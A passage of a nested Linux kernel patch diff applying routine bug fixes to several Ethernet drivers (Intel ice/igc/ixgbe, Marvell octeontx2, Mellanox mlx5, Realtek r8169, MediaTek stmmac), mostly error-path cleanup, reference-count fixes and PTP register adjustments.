+ 		goto exit;
+ 	}
+@@ -460,6 +461,9 @@ static struct tty_driver *ice_gnss_create_tty_driver(struct ice_pf *pf)
+ 	for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++) {
+ 		pf->gnss_tty_port[i] = kzalloc(sizeof(*pf->gnss_tty_port[i]),
+ 					       GFP_KERNEL);
++		if (!pf->gnss_tty_port[i])
++			goto err_out;
++
+ 		pf->gnss_serial[i] = NULL;
+ 
+ 		tty_port_init(pf->gnss_tty_port[i]);
+@@ -469,21 +473,23 @@ static struct tty_driver *ice_gnss_create_tty_driver(struct ice_pf *pf)
+ 	err = tty_register_driver(tty_driver);
+ 	if (err) {
+ 		dev_err(dev, "Failed to register TTY driver err=%d\n", err);
+-
+-		for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++) {
+-			tty_port_destroy(pf->gnss_tty_port[i]);
+-			kfree(pf->gnss_tty_port[i]);
+-		}
+-		kfree(ttydrv_name);
+-		tty_driver_kref_put(pf->ice_gnss_tty_driver);
+-
+-		return NULL;
++		goto err_out;
+ 	}
+ 
+ 	for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++)
+ 		dev_info(dev, "%s%d registered\n", ttydrv_name, i);
+ 
+ 	return tty_driver;
++
++err_out:
++	while (i--) {
++		tty_port_destroy(pf->gnss_tty_port[i]);
++		kfree(pf->gnss_tty_port[i]);
++	}
++	kfree(ttydrv_name);
++	tty_driver_kref_put(pf->ice_gnss_tty_driver);
++
++	return NULL;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 4ad35fbdc02e8..dbfa4b9dee066 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -466,7 +466,9 @@
+ #define IGC_TSAUXC_EN_TT0	BIT(0)  /* Enable target time 0. */
+ #define IGC_TSAUXC_EN_TT1	BIT(1)  /* Enable target time 1. */
+ #define IGC_TSAUXC_EN_CLK0	BIT(2)  /* Enable Configurable Frequency Clock 0. */
++#define IGC_TSAUXC_ST0		BIT(4)  /* Start Clock 0 Toggle on Target Time 0. */
+ #define IGC_TSAUXC_EN_CLK1	BIT(5)  /* Enable Configurable Frequency Clock 1. */
++#define IGC_TSAUXC_ST1		BIT(7)  /* Start Clock 1 Toggle on Target Time 1. */
+ #define IGC_TSAUXC_EN_TS0	BIT(8)  /* Enable hardware timestamp 0. */
+ #define IGC_TSAUXC_AUTT0	BIT(9)  /* Auxiliary Timestamp Taken. */
+ #define IGC_TSAUXC_EN_TS1	BIT(10) /* Enable hardware timestamp 0. */
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index 8dbb9f903ca70..c34734d432e0d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -322,7 +322,7 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 		ts = ns_to_timespec64(ns);
+ 		if (rq->perout.index == 1) {
+ 			if (use_freq) {
+-				tsauxc_mask = IGC_TSAUXC_EN_CLK1;
++				tsauxc_mask = IGC_TSAUXC_EN_CLK1 | IGC_TSAUXC_ST1;
+ 				tsim_mask = 0;
+ 			} else {
+ 				tsauxc_mask = IGC_TSAUXC_EN_TT1;
+@@ -333,7 +333,7 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 			freqout = IGC_FREQOUT1;
+ 		} else {
+ 			if (use_freq) {
+-				tsauxc_mask = IGC_TSAUXC_EN_CLK0;
++				tsauxc_mask = IGC_TSAUXC_EN_CLK0 | IGC_TSAUXC_ST0;
+ 				tsim_mask = 0;
+ 			} else {
+ 				tsauxc_mask = IGC_TSAUXC_EN_TT0;
+@@ -347,10 +347,12 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 		tsauxc = rd32(IGC_TSAUXC);
+ 		tsim = rd32(IGC_TSIM);
+ 		if (rq->perout.index == 1) {
+-			tsauxc &= ~(IGC_TSAUXC_EN_TT1 | IGC_TSAUXC_EN_CLK1);
++			tsauxc &= ~(IGC_TSAUXC_EN_TT1 | IGC_TSAUXC_EN_CLK1 |
++				    IGC_TSAUXC_ST1);
+ 			tsim &= ~IGC_TSICR_TT1;
+ 		} else {
+-			tsauxc &= ~(IGC_TSAUXC_EN_TT0 | IGC_TSAUXC_EN_CLK0);
++			tsauxc &= ~(IGC_TSAUXC_EN_TT0 | IGC_TSAUXC_EN_CLK0 |
++				    IGC_TSAUXC_ST0);
+ 			tsim &= ~IGC_TSICR_TT0;
+ 		}
+ 		if (on) {
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+index 24aa97f993ca1..123dca9ce4683 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+@@ -855,9 +855,11 @@ static struct pci_dev *ixgbe_get_first_secondary_devfn(unsigned int devfn)
+ 	rp_pdev = pci_get_domain_bus_and_slot(0, 0, devfn);
+ 	if (rp_pdev && rp_pdev->subordinate) {
+ 		bus = rp_pdev->subordinate->number;
++		pci_dev_put(rp_pdev);
+ 		return pci_get_domain_bus_and_slot(0, bus, 0);
+ 	}
+ 
++	pci_dev_put(rp_pdev);
+ 	return NULL;
+ }
+ 
+@@ -874,6 +876,7 @@ static bool ixgbe_x550em_a_has_mii(struct ixgbe_hw *hw)
+ 	struct ixgbe_adapter *adapter = hw->back;
+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct pci_dev *func0_pdev;
++	bool has_mii = false;
+ 
+ 	/* For the C3000 family of SoCs (x550em_a) the internal ixgbe devices
+ 	 * are always downstream of root ports @ 0000:00:16.0 & 0000:00:17.0
+@@ -884,15 +887,16 @@ static bool ixgbe_x550em_a_has_mii(struct ixgbe_hw *hw)
+ 	func0_pdev = ixgbe_get_first_secondary_devfn(PCI_DEVFN(0x16, 0));
+ 	if (func0_pdev) {
+ 		if (func0_pdev == pdev)
+-			return true;
+-		else
+-			return false;
++			has_mii = true;
++		goto out;
+ 	}
+ 	func0_pdev = ixgbe_get_first_secondary_devfn(PCI_DEVFN(0x17, 0));
+ 	if (func0_pdev == pdev)
+-		return true;
++		has_mii = true;
+ 
+-	return false;
++out:
++	pci_dev_put(func0_pdev);
++	return has_mii;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index c8724bfa86b0e..8fdd3afe59981 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -768,9 +768,9 @@ int cgx_lmac_rx_tx_enable(void *cgxd, int lmac_id, bool enable)
+ 
+ 	cfg = cgx_read(cgx, lmac_id, CGXX_CMRX_CFG);
+ 	if (enable)
+-		cfg |= CMR_EN | DATA_PKT_RX_EN | DATA_PKT_TX_EN;
++		cfg |= DATA_PKT_RX_EN | DATA_PKT_TX_EN;
+ 	else
+-		cfg &= ~(CMR_EN | DATA_PKT_RX_EN | DATA_PKT_TX_EN);
++		cfg &= ~(DATA_PKT_RX_EN | DATA_PKT_TX_EN);
+ 	cgx_write(cgx, lmac_id, CGXX_CMRX_CFG, cfg);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+index 0b06788b8d80a..04338db38671b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+@@ -30,7 +30,6 @@
+ #define CMR_P2X_SEL_SHIFT		59ULL
+ #define CMR_P2X_SEL_NIX0		1ULL
+ #define CMR_P2X_SEL_NIX1		2ULL
+-#define CMR_EN				BIT_ULL(55)
+ #define DATA_PKT_TX_EN			BIT_ULL(53)
+ #define DATA_PKT_RX_EN			BIT_ULL(54)
+ #define CGX_LMAC_TYPE_SHIFT		40
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 86653bb8e403a..7f8ffbf79cf74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -758,6 +758,8 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	if (vf->otx2_wq)
+ 		destroy_workqueue(vf->otx2_wq);
+ 	otx2_ptp_destroy(vf);
++	otx2_mcam_flow_del(vf);
++	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index e7a894ba5c3ea..723891eb86eec 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -2177,15 +2177,9 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	cmd->stats = kvcalloc(MLX5_CMD_OP_MAX, sizeof(*cmd->stats), GFP_KERNEL);
+-	if (!cmd->stats)
+-		return -ENOMEM;
+-
+ 	cmd->pool = dma_pool_create("mlx5_cmd", mlx5_core_dma_dev(dev), size, align, 0);
+-	if (!cmd->pool) {
+-		err = -ENOMEM;
+-		goto dma_pool_err;
+-	}
++	if (!cmd->pool)
++		return -ENOMEM;
+ 
+ 	err = alloc_cmd_page(dev, cmd);
+ 	if (err)
+@@ -2269,8 +2263,6 @@ err_free_page:
+ 
+ err_free_pool:
+ 	dma_pool_destroy(cmd->pool);
+-dma_pool_err:
+-	kvfree(cmd->stats);
+ 	return err;
+ }
+ 
+@@ -2283,7 +2275,6 @@ void mlx5_cmd_cleanup(struct mlx5_core_dev *dev)
+ 	destroy_msg_cache(dev);
+ 	free_cmd_page(dev, cmd);
+ 	dma_pool_destroy(cmd->pool);
+-	kvfree(cmd->stats);
+ }
+ 
+ void mlx5_cmd_set_state(struct mlx5_core_dev *dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
+index fd07c4cbfd1d2..1f62c702b6255 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
+@@ -88,6 +88,8 @@ static int mlx5e_gen_ip_tunnel_header_vxlan(char buf[],
+ 	struct udphdr *udp = (struct udphdr *)(buf);
+ 	struct vxlanhdr *vxh;
+ 
++	if (tun_key->tun_flags & TUNNEL_VXLAN_OPT)
++		return -EOPNOTSUPP;
+ 	vxh = (struct vxlanhdr *)((char *)udp + sizeof(struct udphdr));
+ 	*ip_proto = IPPROTO_UDP;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index f900709639f6e..b92d541b5286e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -62,6 +62,7 @@ struct mlx5e_macsec_sa {
+ 	u32 enc_key_id;
+ 	u32 next_pn;
+ 	sci_t sci;
++	ssci_t ssci;
+ 	salt_t salt;
+ 
+ 	struct rhash_head hash;
+@@ -358,7 +359,6 @@ static int mlx5e_macsec_init_sa(struct macsec_context *ctx,
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 	struct mlx5_macsec_obj_attrs obj_attrs;
+ 	union mlx5e_macsec_rule *macsec_rule;
+-	struct macsec_key *key;
+ 	int err;
+ 
+ 	obj_attrs.next_pn = sa->next_pn;
+@@ -368,13 +368,9 @@ static int mlx5e_macsec_init_sa(struct macsec_context *ctx,
+ 	obj_attrs.aso_pdn = macsec->aso.pdn;
+ 	obj_attrs.epn_state = sa->epn_state;
+ 
+-	key = (is_tx) ? &ctx->sa.tx_sa->key : &ctx->sa.rx_sa->key;
+-
+ 	if (sa->epn_state.epn_enabled) {
+-		obj_attrs.ssci = (is_tx) ? cpu_to_be32((__force u32)ctx->sa.tx_sa->ssci) :
+-					   cpu_to_be32((__force u32)ctx->sa.rx_sa->ssci);
+-
+-		memcpy(&obj_attrs.salt, &key->salt, sizeof(key->salt));
++		obj_attrs.ssci = cpu_to_be32((__force u32)sa->ssci);
++		memcpy(&obj_attrs.salt, &sa->salt, sizeof(sa->salt));
+ 	}
+ 
+ 	obj_attrs.replay_window = ctx->secy->replay_window;
+@@ -499,10 +495,11 @@ mlx5e_macsec_get_macsec_device_context(const struct mlx5e_macsec *macsec,
+ }
+ 
+ static void update_macsec_epn(struct mlx5e_macsec_sa *sa, const struct macsec_key *key,
+-			      const pn_t *next_pn_halves)
++			      const pn_t *next_pn_halves, ssci_t ssci)
+ {
+ 	struct mlx5e_macsec_epn_state *epn_state = &sa->epn_state;
+ 
++	sa->ssci = ssci;
+ 	sa->salt = key->salt;
+ 	epn_state->epn_enabled = 1;
+ 	epn_state->epn_msb = next_pn_halves->upper;
+@@ -550,7 +547,8 @@ static int mlx5e_macsec_add_txsa(struct macsec_context *ctx)
+ 	tx_sa->assoc_num = assoc_num;
+ 
+ 	if (secy->xpn)
+-		update_macsec_epn(tx_sa, &ctx_tx_sa->key, &ctx_tx_sa->next_pn_halves);
++		update_macsec_epn(tx_sa, &ctx_tx_sa->key, &ctx_tx_sa->next_pn_halves,
++				  ctx_tx_sa->ssci);
+ 
+ 	err = mlx5_create_encryption_key(mdev, ctx->sa.key, secy->key_len,
+ 					 MLX5_ACCEL_OBJ_MACSEC_KEY,
+@@ -945,7 +943,8 @@ static int mlx5e_macsec_add_rxsa(struct macsec_context *ctx)
+ 	rx_sa->fs_id = rx_sc->sc_xarray_element->fs_id;
+ 
+ 	if (ctx->secy->xpn)
+-		update_macsec_epn(rx_sa, &ctx_rx_sa->key, &ctx_rx_sa->next_pn_halves);
++		update_macsec_epn(rx_sa, &ctx_rx_sa->key, &ctx_rx_sa->next_pn_halves,
++				  ctx_rx_sa->ssci);
+ 
+ 	err = mlx5_create_encryption_key(mdev, ctx->sa.key, ctx->secy->key_len,
+ 					 MLX5_ACCEL_OBJ_MACSEC_KEY,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 951ede4338132..4dc149ef618c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4071,6 +4071,9 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 	struct mlx5e_vlan_table *vlan;
+ 	struct mlx5e_params *params;
+ 
++	if (!netif_device_present(netdev))
++		return features;
++
+ 	vlan = mlx5e_fs_get_vlan(priv->fs);
+ 	mutex_lock(&priv->state_lock);
+ 	params = &priv->channels.params;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index a61a43fc8d5c5..56d1bd22c7c66 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2300,7 +2300,7 @@ static inline void mlx5i_complete_rx_cqe(struct mlx5e_rq *rq,
+ 
+ 	priv = mlx5i_epriv(netdev);
+ 	tstamp = &priv->tstamp;
+-	stats = rq->stats;
++	stats = &priv->channel_stats[rq->ix]->rq;
+ 
+ 	flags_rqpn = be32_to_cpu(cqe->flags_rqpn);
+ 	g = (flags_rqpn >> 28) & 3;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index bd9936af45827..4c313b7424bf5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1283,7 +1283,6 @@ mlx5e_tc_add_nic_flow(struct mlx5e_priv *priv,
+ 
+ 	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR) {
+ 		err = mlx5e_attach_mod_hdr(priv, flow, parse_attr);
+-		mlx5e_mod_hdr_dealloc(&parse_attr->mod_hdr_acts);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1341,8 +1340,10 @@ static void mlx5e_tc_del_nic_flow(struct mlx5e_priv *priv,
+ 	}
+ 	mutex_unlock(&tc->t_lock);
+ 
+-	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR)
++	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR) {
++		mlx5e_mod_hdr_dealloc(&attr->parse_attr->mod_hdr_acts);
+ 		mlx5e_detach_mod_hdr(priv, flow);
++	}
+ 
+ 	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_COUNT)
+ 		mlx5_fc_destroy(priv->mdev, attr->counter);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 8c6c9bcb3dc3f..b4e263e8cfb87 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -142,7 +142,7 @@ mlx5_eswitch_set_rule_source_port(struct mlx5_eswitch *esw,
+ 		if (mlx5_esw_indir_table_decap_vport(attr))
+ 			vport = mlx5_esw_indir_table_decap_vport(attr);
+ 
+-		if (attr && !attr->chain && esw_attr->int_port)
++		if (!attr->chain && esw_attr && esw_attr->int_port)
+ 			metadata =
+ 				mlx5e_tc_int_port_get_metadata_for_match(esw_attr->int_port);
+ 		else
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+index c247cca154e9c..eff92dc0927c1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+@@ -90,9 +90,21 @@ static void mlx5i_get_ringparam(struct net_device *dev,
+ static int mlx5i_set_channels(struct net_device *dev,
+ 			      struct ethtool_channels *ch)
+ {
+-	struct mlx5e_priv *priv = mlx5i_epriv(dev);
++	struct mlx5i_priv *ipriv = netdev_priv(dev);
++	struct mlx5e_priv *epriv = mlx5i_epriv(dev);
++
++	/* rtnl lock protects from race between this ethtool op and sub
++	 * interface ndo_init/uninit.
++	 */
++	ASSERT_RTNL();
++	if (ipriv->num_sub_interfaces > 0) {
++		mlx5_core_warn(epriv->mdev,
++			       "can't change number of channels for interfaces with sub interfaces (%u)\n",
++			       ipriv->num_sub_interfaces);
++		return -EINVAL;
++	}
+ 
+-	return mlx5e_ethtool_set_channels(priv, ch);
++	return mlx5e_ethtool_set_channels(epriv, ch);
+ }
+ 
+ static void mlx5i_get_channels(struct net_device *dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 84f5352b0ce19..038ae0fcf9d45 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -160,6 +160,44 @@ void mlx5i_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 	stats->tx_dropped = sstats->tx_queue_dropped;
+ }
+ 
++struct net_device *mlx5i_parent_get(struct net_device *netdev)
++{
++	struct mlx5e_priv *priv = mlx5i_epriv(netdev);
++	struct mlx5i_priv *ipriv, *parent_ipriv;
++	struct net_device *parent_dev;
++	int parent_ifindex;
++
++	ipriv = priv->ppriv;
++
++	parent_ifindex = netdev->netdev_ops->ndo_get_iflink(netdev);
++	parent_dev = dev_get_by_index(dev_net(netdev), parent_ifindex);
++	if (!parent_dev)
++		return NULL;
++
++	parent_ipriv = netdev_priv(parent_dev);
++
++	ASSERT_RTNL();
++	parent_ipriv->num_sub_interfaces++;
++
++	ipriv->parent_dev = parent_dev;
++
++	return parent_dev;
++}
++
++void mlx5i_parent_put(struct net_device *netdev)
++{
++	struct mlx5e_priv *priv = mlx5i_epriv(netdev);
++	struct mlx5i_priv *ipriv, *parent_ipriv;
++
++	ipriv = priv->ppriv;
++	parent_ipriv = netdev_priv(ipriv->parent_dev);
++
++	ASSERT_RTNL();
++	parent_ipriv->num_sub_interfaces--;
++
++	dev_put(ipriv->parent_dev);
++}
++
+ int mlx5i_init_underlay_qp(struct mlx5e_priv *priv)
+ {
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
+index 99d46fda9f82f..f3f2af972020a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
+@@ -54,9 +54,11 @@ struct mlx5i_priv {
+ 	struct rdma_netdev rn; /* keep this first */
+ 	u32 qpn;
+ 	bool   sub_interface;
++	u32    num_sub_interfaces;
+ 	u32    qkey;
+ 	u16    pkey_index;
+ 	struct mlx5i_pkey_qpn_ht *qpn_htbl;
++	struct net_device *parent_dev;
+ 	char  *mlx5e_priv[];
+ };
+ 
+@@ -117,5 +119,9 @@ void mlx5i_sq_xmit(struct mlx5e_txqsq *sq, struct sk_buff *skb,
+ 		   struct mlx5_av *av, u32 dqpn, u32 dqkey, bool xmit_more);
+ void mlx5i_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats);
+ 
++/* Reference management for child to parent interfaces. */
++struct net_device *mlx5i_parent_get(struct net_device *netdev);
++void mlx5i_parent_put(struct net_device *netdev);
++
+ #endif /* CONFIG_MLX5_CORE_IPOIB */
+ #endif /* __MLX5E_IPOB_H__ */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
+index 0227a521d301e..0cf4eaf852d2a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
+@@ -158,21 +158,28 @@ static int mlx5i_pkey_dev_init(struct net_device *dev)
+ 	struct mlx5e_priv *priv = mlx5i_epriv(dev);
+ 	struct mlx5i_priv *ipriv, *parent_ipriv;
+ 	struct net_device *parent_dev;
+-	int parent_ifindex;
+ 
+ 	ipriv = priv->ppriv;
+ 
+-	/* Get QPN to netdevice hash table from parent */
+-	parent_ifindex = dev->netdev_ops->ndo_get_iflink(dev);
+-	parent_dev = dev_get_by_index(dev_net(dev), parent_ifindex);
++	/* Link to parent */
++	parent_dev = mlx5i_parent_get(dev);
+ 	if (!parent_dev) {
+ 		mlx5_core_warn(priv->mdev, "failed to get parent device\n");
+ 		return -EINVAL;
+ 	}
+ 
++	if (dev->num_rx_queues < parent_dev->real_num_rx_queues) {
++		mlx5_core_warn(priv->mdev,
++			       "failed to create child device with rx queues [%d] less than parent's [%d]\n",
++			       dev->num_rx_queues,
++			       parent_dev->real_num_rx_queues);
++		mlx5i_parent_put(dev);
++		return -EINVAL;
++	}
++
++	/* Get QPN to netdevice hash table from parent */
+ 	parent_ipriv = netdev_priv(parent_dev);
+ 	ipriv->qpn_htbl = parent_ipriv->qpn_htbl;
+-	dev_put(parent_dev);
+ 
+ 	return mlx5i_dev_init(dev);
+ }
+@@ -184,6 +191,7 @@ static int mlx5i_pkey_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ static void mlx5i_pkey_dev_cleanup(struct net_device *netdev)
+ {
++	mlx5i_parent_put(netdev);
+ 	return mlx5i_dev_cleanup(netdev);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+index d3a9ae80fd30e..d7ddfc489536e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+@@ -691,7 +691,7 @@ static int mlx5_ptp_verify(struct ptp_clock_info *ptp, unsigned int pin,
+ static const struct ptp_clock_info mlx5_ptp_clock_info = {
+ 	.owner		= THIS_MODULE,
+ 	.name		= "mlx5_ptp",
+-	.max_adj	= 100000000,
++	.max_adj	= 50000000,
+ 	.n_alarm	= 0,
+ 	.n_ext_ts	= 0,
+ 	.n_per_out	= 0,
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index e5a2bbe064f8f..8e368318558ac 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -853,6 +853,9 @@ void lan966x_ptp_deinit(struct lan966x *lan966x)
+ 	struct lan966x_port *port;
+ 	int i;
+ 
++	if (!lan966x->ptp)
++		return;
++
+ 	for (i = 0; i < lan966x->num_phys_ports; i++) {
+ 		port = lan966x->ports[i];
+ 		if (!port)
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index a73d061d9fcb1..fe8dc8e0522b0 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -1996,10 +1996,7 @@ static enum mac_version rtl8169_get_mac_version(u16 xid, bool gmii)
+ 
+ 		/* 8168F family. */
+ 		{ 0x7c8, 0x488,	RTL_GIGA_MAC_VER_38 },
+-		/* It seems this chip version never made it to
+-		 * the wild. Let's disable detection.
+-		 * { 0x7cf, 0x481,	RTL_GIGA_MAC_VER_36 },
+-		 */
++		{ 0x7cf, 0x481,	RTL_GIGA_MAC_VER_36 },
+ 		{ 0x7cf, 0x480,	RTL_GIGA_MAC_VER_35 },
+ 
+ 		/* 8168E family. */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index d42e1afb65213..2f7d8e4561d92 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -90,7 +90,6 @@ struct mediatek_dwmac_plat_data {
+ struct mediatek_dwmac_variant {
+ 	int (*dwmac_set_phy_interface)(struct mediatek_dwmac_plat_data *plat);
+ 	int (*dwmac_set_delay)(struct mediatek_dwmac_plat_data *plat);
+-	void (*dwmac_fix_mac_speed)(void *priv, unsigned int speed);
+ 
+ 	/* clock ids to be requested */
+ 	const char * const *clk_list;
+@@ -443,32 +442,9 @@ static int mt8195_set_delay(struct mediatek_dwmac_plat_data *plat)
+ 	return 0;
+ }
+ 
+-static void mt8195_fix_mac_speed(void *priv, unsigned int speed)
+-{
+-	struct mediatek_dwmac_plat_data *priv_plat = priv;
+-
+-	if ((phy_interface_mode_is_rgmii(priv_plat->phy_mode))) {
+-		/* prefer 2ns fixed delay which is controlled by TXC_PHASE_CTRL,
+-		 * when link speed is 1Gbps with RGMII interface,
+-		 * Fall back to delay macro circuit for 10/100Mbps link speed.
+-		 */
+-		if (speed == SPEED_1000)
+-			regmap_update_bits(priv_plat->peri_regmap,
+-					   MT8195_PERI_ETH_CTRL0,
+-					   MT8195_RGMII_TXC_PHASE_CTRL |
+-					   MT8195_DLY_GTXC_ENABLE |
+-					   MT8195_DLY_GTXC_INV |
+-					   MT8195_DLY_GTXC_STAGES,
+-					   MT8195_RGMII_TXC_PHASE_CTRL);
+-		else
+-			mt8195_set_delay(priv_plat);
+-	}
+-}
+-
+ static const struct mediatek_dwmac_variant mt8195_gmac_variant = {
+ 	.dwmac_set_phy_interface = mt8195_set_interface,
+ 	.dwmac_set_delay = mt8195_set_delay,
+-	.dwmac_fix_mac_speed = mt8195_fix_mac_speed,
+ 	.clk_list = mt8195_dwmac_clk_l,
+ 	.num_clks = ARRAY_SIZE(mt8195_dwmac_clk_l),
+ 	.dma_bit_mask = 35,
+@@ -619,8 +595,6 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+-	if (priv_plat->variant->dwmac_fix_mac_speed)
+-		plat->fix_mac_speed = priv_plat->variant->dwmac_fix_mac_speed;
+ 
+ 	plat->safety_feat_cfg = devm_kzalloc(&pdev->dev,
+ 					     sizeof(*plat->safety_feat_cfg),
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
+index 4d11980dcd64d..9c91a3dc8e385 100644
